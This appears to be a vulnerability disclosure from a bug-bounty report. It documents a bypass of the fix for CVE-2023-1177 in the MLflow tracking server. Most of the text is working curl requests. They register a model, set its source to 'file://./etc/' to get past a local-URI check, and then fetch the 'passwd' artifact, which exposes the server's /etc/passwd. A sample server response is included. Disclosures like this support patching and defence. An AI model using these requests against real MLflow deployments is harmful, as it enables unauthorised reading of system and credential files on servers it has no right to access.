This is a bypass to the following submission <https://huntr.dev/bounties/1fe8f21a-c438-4cba-9add-e8a5dab94e28/> which was assigned CVE-2023-1177.
Start the server or UI (it works on both identically)
mlflow ui --host 127.0.0.1:5000
curl -i -s -k -X $'POST' -H $'Host: 127.0.0.1:5000' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/109.0' -H $'Accept: /' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Referer: http://127.0.0.1:5000/' -H $'Content-Type: application/json; charset=utf-8' -H $'Origin: http://127.0.0.1:5000' -H $'Connection: close' -H $'Sec-Fetch-Dest: empty' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Site: same-origin' --data-binary $'{"name":"AJAX-API"}' $'http://127.0.0.1:5000/ajax-api/2.0/mlflow/registered-models/create'
file://./etc/
. If file:///etc/
is used an exception is thrown due to the check present in is_local_uri
method.curl -i -s -k -X $'POST' -H $'Host: 127.0.0.1:5000' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/109.0' -H $'Accept: /' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Referer: http://127.0.0.1:5000/' -H $'Content-Type: application/json; charset=utf-8' -H $'Origin: http://127.0.0.1:5000' -H $'Connection: close' -H $'Sec-Fetch-Dest: empty' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Site: same-origin' --data-binary $'{"name":"AJAX-API","source":"file://./etc/"}' $'http://127.0.0.1:5000/ajax-api/2.0/mlflow/model-versions/create
Response:
{
"model_version": {
"name": "AJAX-API",
"version": "1",
"creation_timestamp": 1679914680236,
"last_updated_timestamp": 1679914680236,
"current_stage": "None",
"description": "",
"source": "file://./etc/",
"run_id": "",
"status": "READY",
"run_link": ""
}
}
curl http://127.0.0.1:5000/model-versions/get-artifact?path=passwd&name=AJAX-API&version={{version number}}
Notice the contents of /etc/passwd
file in the response.